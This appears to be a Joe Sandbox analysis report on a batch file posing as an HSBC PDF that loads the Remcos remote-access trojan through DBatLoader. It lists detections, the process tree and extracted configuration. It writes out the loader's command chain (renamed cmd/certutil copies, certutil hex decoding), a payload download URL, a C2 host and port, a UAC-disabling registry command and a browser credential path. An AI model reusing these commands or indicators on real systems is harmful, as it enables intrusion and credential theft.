Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
USD470900_COPY_800BLHSBC882001.PDF.bat

Overview

General Information

Sample name:USD470900_COPY_800BLHSBC882001.PDF.bat
Analysis ID:1559105
MD5:c96743116088d21b52516f16f4866f69
SHA1:9b9d500993f74ed975945419b6a25c03e80d8400
SHA256:58348cc94b984ca026fa0a319b93ac988a394ed3d5ec39c01c47a8e762ebdb16
Tags:batHSBCuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Machine Learning detection for dropped file
Queues an APC in another process (thread injection)
Registers a new ROOT certificate
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7588 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7608 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7620 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7648 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7664 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7716 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7732 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 7748 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7948 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 7988 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8020 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SndVol.exe (PID: 8072 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
    • alpha.exe (PID: 7760 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7780 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Faogvkgh.PIF (PID: 6888 cmdline: "C:\Users\Public\Libraries\Faogvkgh.PIF" MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
    • SndVol.exe (PID: 5612 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Faogvkgh.PIF (PID: 2068 cmdline: "C:\Users\Public\Libraries\Faogvkgh.PIF" MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
    • SndVol.exe (PID: 7296 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn"]}

Threatname: Remcos

{"Host:Port:Password": ["127.0.0.1:47666:1", "iamblessed.duckdns.org:47666:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-H5EBMC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x691e0:$a1: Remcos restarted by watchdog!
          • 0x69738:$a3: %02i:%02i:%02i:%03i
          • 0x69abd:$a4: * Remcos v
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          20.2.SndVol.exe.2cf0000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            20.2.SndVol.exe.2cf0000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x691e0:$a1: Remcos restarted by watchdog!
            • 0x69738:$a3: %02i:%02i:%02i:%03i
            • 0x69abd:$a4: * Remcos v
            20.2.SndVol.exe.2cf0000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
            • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6320c:$str_b2: Executing file:
            • 0x64328:$str_b3: GetDirectListeningPort
            • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x63e30:$str_b7: \update.vbs
            • 0x63234:$str_b9: Downloaded file:
            • 0x63220:$str_b10: Downloading file:
            • 0x632c4:$str_b12: Failed to upload file:
            • 0x642f0:$str_b13: StartForward
            • 0x64310:$str_b14: StopForward
            • 0x63dd8:$str_b15: fso.DeleteFile "
            • 0x63d6c:$str_b16: On Error Resume Next
            • 0x63e08:$str_b17: fso.DeleteFolder "
            • 0x632b4:$str_b18: Uploaded file:
            • 0x63274:$str_b19: Unable to delete:
            • 0x63da0:$str_b20: while fso.FileExists("
            • 0x63749:$str_c0: [Firefox StoredLogins not found]
            20.2.SndVol.exe.2cf0000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x63100:$s1: \Classes\mscfile\shell\open\command
            • 0x63160:$s1: \Classes\mscfile\shell\open\command
            • 0x63148:$s2: eventvwr.exe
            25.2.SndVol.exe.27d0000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 24 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
              Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7608, ProcessName: alpha.exe
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Faogvkgh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Faogvkgh
              Sigma detected: Parent in Public Folder Suspicious Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7608, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7620, ProcessName: extrac32.exe
              Sigma detected: Suspicious Program Location with Network Connections
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 216.172.172.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 7748, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Faogvkgh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Faogvkgh
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, ProcessName: AnyDesk.PIF

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 5D 75 B6 54 7C 5B 05 A0 CD D5 17 06 F3 2B 17 08 96 5D 2F B3 36 CB 86 F5 3D A1 68 FD 22 7C B7 33 08 77 3C 7D EE E7 83 CF D4 FC 1C 29 CA DE 1D B0 F1 08 D3 55 27 7D C9 8D 95 65 19 D5 B8 8F , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-H5EBMC\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T07:53:20.198467+010020365941Malware Command and Control Activity Detected192.168.2.84970977.221.149.3847666TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T07:53:21.628365+010028033043Unknown Traffic192.168.2.849710178.237.33.5080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["127.0.0.1:47666:1", "iamblessed.duckdns.org:47666:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-H5EBMC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
              Source: 18.3.esentutl.exe.4d20000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn"]}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\AnyDesk.PIFReversingLabs: Detection: 31%
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFReversingLabs: Detection: 31%
              Multi AV Scanner detection for submitted file
              Source: USD470900_COPY_800BLHSBC882001.PDF.batReversingLabs: Detection: 18%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\AnyDesk.PIFJoe Sandbox ML: detected
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFJoe Sandbox ML: detected
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC12F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68FC12F38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC12C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF68FC12C2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC59134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF68FC59134
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7124 BCryptGenerateKeyPair,#360,7_2_00007FF68FCD7124
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF68FCC511C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD70C8 BCryptSetProperty,#360,7_2_00007FF68FCD70C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA10D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF68FCA10D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68FCA30D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF68FC4107C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCAB0A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF68FC6B098
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD705C BCryptGetProperty,#360,7_2_00007FF68FCD705C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA1058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF68FCA1058
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD700C BCryptEnumAlgorithms,#360,7_2_00007FF68FCD700C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68FC1302F
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC99028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF68FC99028
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC17034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF68FC17034
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA7020
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA301C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC34F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF68FC34F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF68FCA0FB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF68FCD6FAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC84F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68FC84F50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCCEF74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC90F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF68FC90F58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6F2C NCryptExportKey,#360,7_2_00007FF68FCD6F2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC38F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF68FC38F1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD00ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF68FD00ED0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF68FCA0EF4
